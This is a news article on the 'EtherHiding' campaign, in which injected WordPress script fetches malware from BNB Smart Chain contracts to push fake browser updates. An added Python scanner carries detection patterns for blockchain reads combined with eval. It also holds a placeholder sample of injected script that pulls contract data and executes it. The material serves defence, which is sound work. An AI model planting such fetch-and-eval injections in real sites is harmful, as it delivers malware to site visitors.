Hackers create novel way to hide malicious code in blockchains

Cybercriminals have discovered a new way to deliver malware to unsuspecting users, this time by manipulating BNB Smart Chain (BSC) smart contracts to hide the malware and spread malicious code.

Security researchers from Guardio Labs explained in an Oct. 15 report that the technique, known as “EtherHiding,” involved compromising a WordPress site by injecting code that retrieved a partial payload from a blockchain contract.

The attackers hid the payload within a Binance smart contract, which essentially acts as an anonymous, free escrow platform for them.

Hackers can update the code and change the attack methods at will. The latest attack comes in the form of a fake browser update – prompting victims to update their browser using a fake landing page and link.

The payload contains JavaScript that obtains additional code from the attacker’s domain. This can ultimately lead to entire websites being compromised with fake browser update notifications spreading malware.

This approach allows threat actors to modify the attack chain by simply replacing malicious code with each new blockchain transaction. This makes mitigating attacks challenging, said Nati Tal, head of cybersecurity at Guardio Labs, and security researcher Oleg Zaytsev.

Once infected smart contracts are deployed, they operate autonomously. All Binance can do is rely on its developer community to flag malicious code in contracts when they find it.

The contract address was flagged for fraudulent activity. Source: Guard.io

Guardio said website owners using WordPress (which runs about 43% of websites) need to be extra vigilant about their security practices before adding:

“WordPress sites are highly vulnerable and frequently compromised because they are the primary gateway through which these threats reach large numbers of victims.”
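For site owners, one way to check WordPress files for the pattern described above (injected script that reads from a blockchain contract and then executes what it receives) is a simple file scan. This is an added example, not code from Guardio's report; the marker patterns (BSC RPC hostnames, `eth_call`, web3 library names), the function names and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic markers (assumptions of this example, not indicators from the report).
CHAIN_READ = {
    "bsc_rpc_host": re.compile(r"bsc-dataseed[\w.-]*", re.I),
    "eth_call": re.compile(r"\beth_call\b"),
    "web3_library": re.compile(
        r"\b(?:ethers|web3)(?:\.min)?\.js\b|\bethers\.Contract\b|\bnew\s+Web3\b"),
}
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")
ADDRESS = re.compile(r"\b0x[0-9a-fA-F]{40}\b")

def analyze(text):
    """Return (suspicious, matched_markers, contract_like_addresses)."""
    hits = sorted(name for name, rx in CHAIN_READ.items() if rx.search(text))
    dynamic = bool(DYNAMIC_EXEC.search(text))
    if dynamic:
        hits.append("dynamic_exec")
    # Flag only the combination: a chain read whose result can reach eval().
    suspicious = dynamic and len(hits) > 1
    return suspicious, hits, sorted(set(ADDRESS.findall(text)))

def scan_tree(root, suffixes=(".php", ".js", ".html")):
    """Walk a site directory and return {path: analyze(...)} for flagged files."""
    flagged = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            result = analyze(path.read_text(errors="replace"))
            if result[0]:
                flagged[str(path)] = result
    return flagged

# Constructed, non-functional samples (placeholder address, undefined helpers).
INJECTED = ('<script src="https://cdn.example/ethers.min.js"></script>'
            '<script>rpc("https://bsc-dataseed.binance.org/");'
            'read("0x' + "0" * 40 + '").then(function (s) { eval(s); });</script>')
CLEAN = ('<script src="/wp-includes/js/jquery/jquery.min.js"></script>'
         '<p>Wallet: 0x12</p>')

if __name__ == "__main__":
    for label, sample in (("injected", INJECTED), ("clean", CLEAN)):
        print(label, analyze(sample))
```

Any address the scan extracts can then be looked up on a block explorer to see whether it has been flagged, and a flagged file should be compared against a known-good copy of the theme or plugin.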


The company concluded that Web3 and blockchain bring new possibilities for uncontrolled malicious activity. “Adaptive defenses are needed to address these emerging threats,” the report said.
